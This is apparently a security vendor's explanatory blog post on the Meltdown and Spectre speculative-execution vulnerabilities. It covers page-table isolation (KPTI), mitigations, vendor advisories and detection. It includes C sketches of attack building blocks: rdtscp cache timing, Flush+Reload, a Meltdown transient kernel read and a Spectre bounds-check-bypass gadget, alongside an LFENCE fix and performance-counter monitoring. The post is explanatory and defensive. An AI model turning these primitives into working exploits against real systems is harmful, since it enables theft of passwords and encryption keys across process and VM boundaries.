Exploits & Vulnerabilities
Understanding Meltdown and Spectre
For several days, rumors circulated about a serious vulnerability in Intel processors. It wasn’t until January 3 that the official disclosure of the Meltdown and Spectre vulnerabilities was made, and it became clear how serious the problems were. To summarize, Meltdown and Spectre both allow malicious code to read memory that it would normally not have permission to access.
These vulnerabilities can allow an attacker to steal information such as passwords, encryption keys, or essentially anything the affected system has processed. Unfortunately, the drive to improve performance undermined the security building blocks that mainstream operating systems (Windows, Linux, and macOS at least) rely on to protect the privacy of user data. Proof-of-concept code for both attacks has been made public; no attacks are believed to have used these newly discovered vulnerabilities yet.
This post explains what these vulnerabilities are, how these vulnerabilities arose in the first place, and what vendors are doing to mitigate this threat.
Background: What is Memory Isolation?
Memory virtualization is one of the basic security concepts in current operating systems. It provides memory isolation between user processes, ensuring one user cannot access or modify another user’s data. Today this is implemented with paging. For each process, the kernel maintains large and complex tree structures called page tables (PT) that describe the mapping between virtual and physical addresses and also define access privileges. Supporting hardware in each modern CPU, the memory management unit (MMU), makes this translation as efficient as possible. Several layers of caches, the translation lookaside buffers (TLB), hold recently used translations. Each TLB miss leads to a time-consuming walk of the PT hierarchy; if no valid mapping is found, a page fault trap is raised and handled by the kernel.
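As a rough illustration of this isolation, the minimal sketch below (the kernel address shown is just a placeholder) tries to read kernel memory directly from user code; the MMU access control described above blocks the read and the process receives a SIGSEGV instead of the data.

```c
#include <signal.h>
#include <unistd.h>

/* Handler invoked when the MMU blocks the illegal access. */
static void on_segfault(int sig) {
    (void)sig;
    static const char msg[] = "access denied by the MMU: kernel memory is isolated\n";
    write(STDOUT_FILENO, msg, sizeof(msg) - 1);
    _exit(0);
}

int main(void) {
    signal(SIGSEGV, on_segfault);

    /* Placeholder kernel-space address; user code has no permission to read it. */
    volatile const char *kernel_ptr = (const char *)0xffffffff81000000UL;

    /* This dereference violates the PT access privileges: the MMU raises a
     * page fault and the kernel delivers SIGSEGV instead of the data. */
    char value = *kernel_ptr;

    (void)value;   /* never reached on a correctly isolated system */
    return 0;
}
```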
Current operating systems like Windows, Linux, and macOS (including their mobile derivatives, Android and iOS) all use the same concept. Traditionally, kernel-privileged code and data were mapped into the virtual address space of every process to simplify kernel access to user data. Each change of virtual mapping (switching the PT) usually forces a TLB flush and is unavoidable during process context switches. There was another reason for mapping kernel space into user virtual space: to avoid changing the virtual address mapping (and incurring TLB misses) when switching from user mode to kernel code and back. This was so common that Intel recommended it as a best practice and allocated a single register to hold the pointer to the active PT, which is expected to be reloaded during context switches. The ARM architecture, by contrast, has two PT pointer registers.
Kernel code and data are protected from direct access by user code via MMU access control. Many attacks have been discovered that exploit kernel code bugs, leading to privilege escalation and system control. To carry out these attacks, the attacker needs to know two things: what the vulnerability is, and the address of the related kernel code and/or data.
To defend against this kind of attack, operating systems implemented address space layout randomization (ASLR) years ago; for the kernel specifically, this is kernel ASLR (KASLR). The protection is based on keeping the addresses of kernel structures secret from user processes. There are many attacks against KASLR, some of which can be found here. Many of them are based on measuring the timing difference between memory accesses that hit or miss the TLB; these timing characteristics come from the hardware implementation of the MMU and cannot be easily hidden.
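The timing primitive these attacks build on can be sketched roughly as follows, assuming an x86 CPU and compiler intrinsics for the rdtscp timestamp counter: an access whose translation and data are cached completes measurably faster than one that misses.

```c
#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp, _mm_mfence */

/* Return the number of cycles needed to read one byte at addr.
 * A short time implies the translation/data was cached; a long time
 * implies a TLB or cache miss. */
static inline uint64_t probe_access_time(const volatile uint8_t *addr) {
    unsigned int aux;
    _mm_mfence();                      /* serialize earlier memory operations */
    uint64_t start = __rdtscp(&aux);   /* timestamp before the access */
    (void)*addr;                       /* the memory access being measured */
    uint64_t end = __rdtscp(&aux);     /* timestamp after the access */
    return end - start;
}
```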
In October 2017, researchers from TU Graz published a proposal to split each process’s PT in two. One is active when the process is executing kernel code (this is essentially the original PT). The second is a partial copy that maps user pages plus a few kernel pages needed for context switching, syscall (OS system call) entry, and interrupt handling; the rest of kernel space is invisible. This second PT is active while executing in user space, and the kernel switches between the two on syscall entry and exit. The technique was called KAISER (Kernel Address Isolation to have Side-channels Efficiently Removed) and was able to defend against all known KASLR attacks with an added overhead of less than 1%.
Soon enough, work began to implement KAISER. In the Linux kernel, urgent (but quiet) work on a kernel page-table isolation (KPTI) implementation, based on KAISER, started in November 2017. This part of the kernel changes only rarely, and changes are normally discussed long before any code is written. Needless to say, the work to implement KPTI caught the attention of some observers because of its unusual nature.
Changes in this part of the kernel can have a significant impact on performance. Early tests showed a 5% impact in most cases, with worst-case tests indicating a 50% performance hit. On November 16, it became clear that something like KAISER was being implemented in Windows as well. The Linux KPTI was finally committed to the kernel on December 29.
Meltdown and Spectre
It soon became clear why KAISER was suddenly being implemented: it was an effective defense against Meltdown.
Both Meltdown and Spectre rely on security flaws in the speculative execution of CPU instructions. Modern processors are so fast that executing instructions strictly in order, one by one, would leave the CPU stalled on memory accesses, which take several hundred clock cycles. Instead, modern CPUs execute whatever instructions are ready while waiting for memory read/write operations to complete. Whether the speculatively executed instructions were actually needed is checked later; if the results are not needed, their effects on the CPU’s internal state and memory are supposed to be discarded. This is called speculative and out-of-order execution.
Unfortunately, some side effects of speculative execution remain in low-level CPU state. For example, if a word is speculatively loaded from memory into a register and the speculation is later discarded, the register ends up with its original value, but the cache has still been modified by the read. Similarly, the branch prediction buffers retain information about recently taken code branches. The researchers who discovered Meltdown and Spectre used this low-level CPU state to gain access to protected memory regions through so-called side-channel information transfer.
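The cache side channel is typically exploited with a Flush+Reload pattern along the lines of the simplified sketch below (the 256-slot probe array and 4,096-byte stride are illustrative choices): the speculative code acts as the sender, and the receiver measures which probe slot became fast to load.

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

#define SLOTS   256        /* one slot per possible byte value */
#define STRIDE  4096       /* one page per slot to limit prefetcher interference */

uint8_t probe[SLOTS * STRIDE];

/* Flush: evict every probe slot from the cache before the secret-dependent access. */
static void flush_probe(void) {
    for (int i = 0; i < SLOTS; i++)
        _mm_clflush(&probe[i * STRIDE]);
    _mm_mfence();
}

/* Reload: time each slot; the one that loads fast was touched speculatively,
 * and its index reveals the leaked byte value. */
static int reload_probe(uint64_t threshold_cycles) {
    for (int i = 0; i < SLOTS; i++) {
        unsigned int aux;
        volatile uint8_t *p = &probe[i * STRIDE];
        uint64_t start = __rdtscp(&aux);
        (void)*p;
        uint64_t delta = __rdtscp(&aux) - start;
        if (delta < threshold_cycles)
            return i;      /* cache hit: this slot was brought in as a side effect */
    }
    return -1;             /* no hit detected */
}
```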
Meltdown (CVE-2017-5754) allows an unprivileged user to access the complete kernel (and physical) memory of a computer. This attack is relatively simple to execute; to carry it out, attackers need to run their own program on the target system. This attack is particularly damaging to shared systems (such as cloud services), as an attacker with access to one virtual machine can use Meltdown to access other VMs on the same physical system. Meltdown is specific to Intel systems; AMD and ARM processors are not affected.
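Conceptually, the core of the published Meltdown proof of concept boils down to something like the following simplified sketch; a real exploit also has to suppress or recover from the fault (for example with a signal handler or transactional memory) and then run the Flush+Reload step shown earlier. The kernel_addr parameter and the probe array are placeholders.

```c
#include <stdint.h>

extern uint8_t probe[];        /* probe array from the Flush+Reload sketch above */
#define STRIDE 4096

/* Transiently read one byte from a privileged address. Architecturally the
 * load faults, but on vulnerable CPUs it and the dependent probe access are
 * executed speculatively before the fault is raised, leaving a
 * secret-dependent cache footprint for the receiver to measure. */
static void transient_read(const volatile uint8_t *kernel_addr) {
    uint8_t secret = *kernel_addr;                   /* unauthorized load: raises a fault */
    volatile uint8_t *slot = &probe[secret * STRIDE];
    (void)*slot;                                     /* encodes the byte into the cache */
}
```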
Spectre (CVE-2017-5753, CVE-2017-5715) is a broader vulnerability that relies on flaws in speculative execution itself. In its current form, the attack is more complicated because more prerequisites must be fulfilled. One of them is a code gadget that must be found in code shared by both the victim and the attacker. For some variants of the attack, the CPU’s branch prediction subsystem must be trained to redirect speculative execution to the selected gadget.
This makes exploitation highly dependent on the CPU version, because prediction algorithms and the depth of the prediction buffers differ not only between vendors but also across CPU generations. Two Spectre variants are currently known: one limits the attack to a single process space, while the second requires superuser access. What makes Spectre particularly dangerous is the combination with in-kernel interpreters and JIT compilers such as Linux eBPF, which allow an attacker to place and speculatively run code directly within the kernel context. This could have an impact similar to the Meltdown attack.
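The gadget for the bounds check bypass variant is usually illustrated with code resembling the sketch below (adapted from the pattern in the public write-ups; array1, array1_size, and probe are placeholder names). After the branch predictor has been trained with in-bounds values of x, an out-of-bounds x still causes the body to execute speculatively, leaking array1[x] through the cache.

```c
#include <stddef.h>
#include <stdint.h>

extern uint8_t array1[];       /* victim data; an out-of-bounds x reaches secrets */
extern size_t  array1_size;
extern uint8_t probe[];        /* probe array observed via Flush+Reload */
#define STRIDE 4096

/* Classic Spectre variant 1 gadget: the bounds check is architecturally correct,
 * but a mistrained branch predictor lets the body run speculatively for a
 * malicious, out-of-bounds x. */
void victim_function(size_t x) {
    if (x < array1_size) {
        /* volatile access keeps the secret-dependent load from being optimized out */
        volatile uint8_t *slot = &probe[array1[x] * STRIDE];
        (void)*slot;
    }
}
```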
The real challenge with Spectre is its mitigation. Unlike Meltdown, which could be mitigated via operating system patches, Spectre ultimately requires changes to the hardware itself. As a workaround, some vulnerable code can be protected by inserting synchronization primitives (such as the LFENCE instruction on Intel platforms), which effectively stop speculative execution at that point. Another workaround is the return trampoline (retpoline) approach. Both require compiler modifications and careful selection of the critical locations, which is non-trivial and hard to do without human involvement; inserting barriers indiscriminately would impose a significant performance penalty.
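To illustrate the serialization workaround, here is a hedged sketch of how the gadget above might be hardened on Intel platforms: an LFENCE (via the _mm_lfence intrinsic) inserted after the bounds check keeps the secret-dependent loads from running ahead of it.

```c
#include <stddef.h>
#include <stdint.h>
#include <emmintrin.h>   /* _mm_lfence */

extern uint8_t array1[];
extern size_t  array1_size;
extern uint8_t probe[];
#define STRIDE 4096

/* Same gadget as above with a speculation barrier after the bounds check:
 * the loads below cannot execute until the check has actually resolved. */
void victim_function_fenced(size_t x) {
    if (x < array1_size) {
        _mm_lfence();
        volatile uint8_t *slot = &probe[array1[x] * STRIDE];
        (void)*slot;
    }
}
```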
All modern x86 processors from Intel and AMD, as well as some RISC chips based on the ARM, SPARC, and PowerPC architectures, are believed to be vulnerable. This makes mitigation extremely costly and turns it into a long-term problem for the technology industry as a whole. The ball is now in the CPU vendors’ court: they need to find a way to keep their chips fast without compromising on security, and the speculation algorithms will certainly have to change. It is still an open question what can be fixed through microcode updates and what requires a hardware redesign of the chips.
Solutions and best practices
Mitigation must happen across the different levels of the computing environment. CPU vendors are releasing microcode updates, which will be distributed as part of system firmware. Operating system vendors are releasing kernel and compiler updates, and browsers are being patched as well to protect against Spectre. Users and system administrators should react promptly and install the available updates to reduce the risk of a successful attack.
More software and firmware updates will come in the near future. Unfortunately, detecting an attack is extremely difficult: the only signs are at the microarchitectural level or in unusual system performance statistics, such as an unusually high page fault rate or a low cache hit ratio. No malicious code samples exploiting Meltdown and Spectre are known in the wild, but that can change quickly as proofs of concept are published.
Microsoft has released documents that cover both server and client versions of Windows:
- Windows Server guidance to protect against speculative execution side-channel vulnerabilities
- Windows Client Guidance for IT Pros to protect against speculative execution side-channel vulnerabilities
Note that in order to receive automatic updates from Microsoft, a registry key must be in place on the affected system. Details can be found in this article.
Apple’s December 2017 updates for macOS already resolved the Meltdown vulnerability as well. As noted earlier, patches for Meltdown have been merged into the Linux kernel; it is up to individual vendors to release this update for their distributions, and some, such as Debian, Red Hat, and SUSE, have released bulletins and patches as appropriate.
While no attacks using these vulnerabilities are known to exist in the wild, several proofs of concept have been made publicly available. These are detected as TROJ64_CVE20175753.POC. In addition, Trend Micro™ Deep Security covers Spectre via the following DPI rule:
- Multiple CPU Spectre Attacks Detection (CVE-2017-5753 and CVE-2017-5715)
Similarly, Trend Micro Home Network Security covers both Meltdown and Spectre via the following signature:
- 1134349 WEB-CLIENT Multiple CPU Meltdown/Spectre Attacks Detection
Which CPU families are affected?
CISC-based central processing units such as Intel Core and AMD Ryzen implement speculation and out-of-order execution logic in hardware and microcode on the chip. Processors like Intel Itanium, on the other hand, rely more on the compiler’s code generator for these kinds of optimizations. Some CPU families, such as ARM and IBM POWER, were originally strictly RISC but adopted more CISC-like elements over time, adding complex execution pipelines with on-chip speculation logic. Mitigating vulnerabilities in instruction optimization is clearly much harder when the optimization is implemented in hardware. Generally, every CPU that performs speculative execution is affected at least by Spectre; the difference lies in the complexity of mitigation.
How to detect if your system is under attack
Each modern CPU supports the collection of many different performance counters that track microarchitectural state changes. Observing these statistics can reveal Meltdown and Spectre attacks; the theory for the Intel platform using Processor Counter Monitor is described here. For example, deviations in cache misses, instruction retirement aborts, or branch mispredictions can be detected during an attack. This is currently the most promising way to detect and abort attack code.
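As a rough sketch of how such counters can be read on Linux, the example below uses the perf_event_open system call to count hardware cache misses for the calling process; the choice of events and the thresholds that would indicate an attack are left open.

```c
#include <linux/perf_event.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Open a hardware cache-miss counter for the calling process on any CPU. */
static int open_cache_miss_counter(void) {
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.type = PERF_TYPE_HARDWARE;
    attr.size = sizeof(attr);
    attr.config = PERF_COUNT_HW_CACHE_MISSES;
    attr.disabled = 1;            /* start disabled; enable explicitly below */
    attr.exclude_kernel = 1;      /* count user-space events only */
    attr.exclude_hv = 1;
    return (int)syscall(__NR_perf_event_open, &attr, 0 /* this process */,
                        -1 /* any CPU */, -1 /* no group */, 0);
}

int main(void) {
    int fd = open_cache_miss_counter();
    if (fd < 0) {
        perror("perf_event_open");
        return 1;
    }
    ioctl(fd, PERF_EVENT_IOC_RESET, 0);
    ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);

    /* ... run or observe the workload being monitored here ... */

    ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);
    uint64_t misses = 0;
    if (read(fd, &misses, sizeof(misses)) == sizeof(misses))
        printf("hardware cache misses: %llu\n", (unsigned long long)misses);
    close(fd);
    return 0;
}
```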
Intel releases CPU microcode update for Linux
Intel released a microcode update for its CPUs. Microcode updates are usually delivered as part of the computer’s firmware, but Intel released this update for Linux directly to speed up distribution. The kernel loads the updated CPU microcode from a file stored in the root file system when it starts.
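One quick way to check which microcode revision the kernel has actually loaded is to read the microcode field that Linux exposes in /proc/cpuinfo, as in the small sketch below.

```c
#include <stdio.h>
#include <string.h>

/* Print the microcode revision reported by the kernel for each CPU entry,
 * as a quick check that an updated microcode image was loaded. */
int main(void) {
    FILE *f = fopen("/proc/cpuinfo", "r");
    if (!f) {
        perror("/proc/cpuinfo");
        return 1;
    }
    char line[256];
    while (fgets(line, sizeof(line), f)) {
        if (strncmp(line, "microcode", 9) == 0)
            fputs(line, stdout);       /* e.g. "microcode : 0xc2" */
    }
    fclose(f);
    return 0;
}
```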
Updated on January 11, 2018, 7:30 PM PST:
Virtualized environment
There have been many questions about how to protect against speculation-related vulnerabilities in a virtualized environment. On standalone operating systems, isolation between different processes, as well as between user and system space, is ensured by the virtual memory management concept described above. Virtual machines managed by a hypervisor introduce another level of separation: between different guests, and between the host and its guests.
Today’s CPUs contain hardware-assisted support for virtualization. Intel, for example, has a special set of VMX instructions that make it easier for hypervisors to manage VMs (and enable multi-level virtualization). It also offers VT-x and VT-d technology that extends the MMU’s virtual-to-physical mapping to support virtualization. Intel did this by combining the guest PT with the host PT, increasing the number of PT levels. This way, the PT-walking and TLB logic can remain the same, with only a small memory overhead and slightly more time needed to walk the PT on a TLB miss.
The Meltdown and Spectre speculative execution attacks can cross virtual address space boundaries and bypass privilege-level restrictions to access kernel (and, indirectly, all physical) memory. Unfortunately, this also applies to the boundaries and privileges in a virtualized environment: the memory of a different guest or of the host can be accessed in the same way a different virtual address space or kernel space can be.
In addition to updating the microcode and installing all patches for the guest and host operating systems, the hypervisor itself should also be patched in virtualized environments.
The advisories for VMware are VMSA-2018-0002.1 and VMSA-2018-0004.1. The Xen advisory, XSA-254, is here. Red Hat information related to KVM-based virtualization can be found here.
Updated on February 25, 2018, 6:30 PM PST:
Intel has released stable firmware updates that patch the microcode of Skylake, Kaby Lake, and Coffee Lake processors against the Spectre vulnerability. Updates for other Intel processors used in data center environments are also available. Details about these new updates are available from Intel. These fixes will be made available to end users in the form of BIOS updates, which will be provided by various PC and motherboard vendors as necessary.